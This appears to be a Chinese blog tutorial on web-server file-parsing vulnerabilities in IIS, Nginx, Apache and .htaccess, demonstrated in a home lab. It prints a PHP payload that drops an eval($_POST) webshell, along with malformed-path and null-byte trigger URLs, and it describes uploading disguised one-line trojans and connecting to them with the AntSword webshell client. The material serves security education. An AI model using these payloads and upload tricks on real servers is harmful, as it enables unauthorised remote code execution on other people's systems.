文件解析漏洞总结

1. IIS 5.x/6.0解析漏洞

(1)目录解析漏洞(.asp目录下所有后缀名的文件都被解析成.asp文件)
演示:
环境:Windows Server 2003(其中自带IIS服务)
环境搭建IIS步骤:开始–设置–控制面板–添加或删除程序–添加/删除组件–把应用程序服务勾起点详细信息把ASP.exe勾起,然后安装即可
最主要的是对IIS服务器的配置:打开IIS管理器–本机–网站–默认网站右键属性,得到如下图
在这里插入图片描述
在这里插入图片描述
在我搭建过程中,可以访问根目录下但无法访问根目录下的目录中的文件:
解决方法:
在IIS中选择您的站点->右键->属性,在主目录选项中,修改"执行权限"为"脚本和可执行文件"。
在IIS中选择服务器扩展->右键->属性,勾选“允许所有未知CGI”、“允许所有未知ISAPI”。
<1>进行端口转发,使本机能够访问虚拟机IIS服务器网址,虚拟机用的NAT模式
在这里插入图片描述
<2>环境配置好后,用本机访问该网址
在这里插入图片描述
<3>虚拟机打开网站根目录,在其下创建一个1.txt,在其里面写出ASP一句话木马
在这里插入图片描述
<4>用网站访问该文件
在这里插入图片描述
成功访问
<5>接着在网站根目录下新建一个1.asp目录,然后将1.txt移进去
在这里插入图片描述
<6>用网站继续访问该文件
在这里插入图片描述
发现空白页面,说明asp被成功解析
<7>用蚁剑进行连接
在这里插入图片描述
成功,因此目录解析漏洞演示成功。
(2)文件名解析漏洞(后缀名分号后不解析)
<1>虚拟机打开网站根目录,在其下创建一个2.txt,在其里面写出ASP一句话木马
在这里插入图片描述
<2>用网站访问该文件
在这里插入图片描述
<3>更改该文件的后缀名
在这里插入图片描述
<4>再次访问该文件
在这里插入图片描述
发现空白页面,说明asp被成功解析
<5>用蚁剑进行连接
在这里插入图片描述
成功,因此文件名解析漏洞演示成功。

2.IIS7.0/7.5/Nginx<8.03畸形解析漏洞

在默认Fast-CGI开启状况下,黑客上传一个名字为1.jpg,内容为

<?PHP fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

在这里插入图片描述
然后访问1.jpg/.php,在这个目录就会生成一句话木马shell.php
www.xxx.com/1.jpg/*.php触发漏洞(存在漏洞就会把前面的文件当作php执行)

3.Nginx<0.8.3空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37Nginx在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码

4.Apache解析漏洞

(从右往左解析第一个能识别的后缀名)
多后缀名解析:x.php.xxx
Apache认为一个文件可以有多个后缀名,例如:x.php.xxx。Apache的解析规则是从右往左依次判断后缀名,当Apache不认识这个后缀名时,就继续往左判断后缀名,从右往左都没有认识的,apache就会把该文件当做默认类型进行处理,一般,默认类型是text/plain。mime.types文件记录着apache认识的后缀。通过.xxx绕过检测,借助apache的特性解析php文件
演示:
Kali中是用apache服务搭建网站,因此打开kali
<1>查看端口开发情况
命令:netstat -teln
在这里插入图片描述
发现只有22端口是开放的,我们访问网站需要80端口,因此需要开放80端口,一个完整的web服务器需要apache+php+mysql
Apache和mysql是kali自带的,因此直接打开服务即可,而php需要自己去安装
<2>打开apache和mysql服务
命令:systemctl start 服务名
在这里插入图片描述
<3>下载php环境
命令:apt-get install php5 php-pear
第<2>和<3>相当于搭建一个简单的web服务器
<4>再次查看端口开放情况
在这里插入图片描述
发现开放端口成功
<5>查看kali的ip地址
在这里插入图片描述
<6>通过主机访问网址(即kali的ip地址加端口)
在这里插入图片描述
成功打开默认网址
<7>apache的默认文件在var/www/html下的index.html,因此进入网站根目录下
在这里插入图片描述
<8>为了验证多后缀名解析,新建x.php.xxx文件
在这里插入图片描述
<9>对文件进行编辑,写入php一句话木马
在这里插入图片描述
<10>查看此目录下此文件是否创建成功
在这里插入图片描述
可以看到成功
<11>本机访问此文件
在这里插入图片描述
发现这里直接显示出文件内容,说明apache2中没有解析php的mime类型,因此需要进行添加
<12>找到文件并编辑
在这里插入图片描述
在这里插入图片描述
<13>再次访问x.php.xxx
在这里插入图片描述
发现什么都没显示,说明php解析成功

注意:此处大家应该有很多疑问,因为ip地址换成本地ip了,而不是10.0.78.29(虚拟机ip),因为之前用的网线使用桥接模式,之后没有网线的时候继续写这篇文章,用的无线,因此将虚拟机改为了NAT模式,再次访问虚拟机web服务器时连接不上,所以我这里做了一个端口转发,如下图
在这里插入图片描述
这样就可以连接到虚拟机的web服务器了
<14>通过蚁剑进行连接
在这里插入图片描述
在这里插入图片描述
成功,因此apache解析漏洞演示成功。

5.Htaccess文件解析

例如写一个.htaccess文件内容为:
在这里插入图片描述
先上传3.gif,再上传.htaccess文件便可以解析成php文件

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值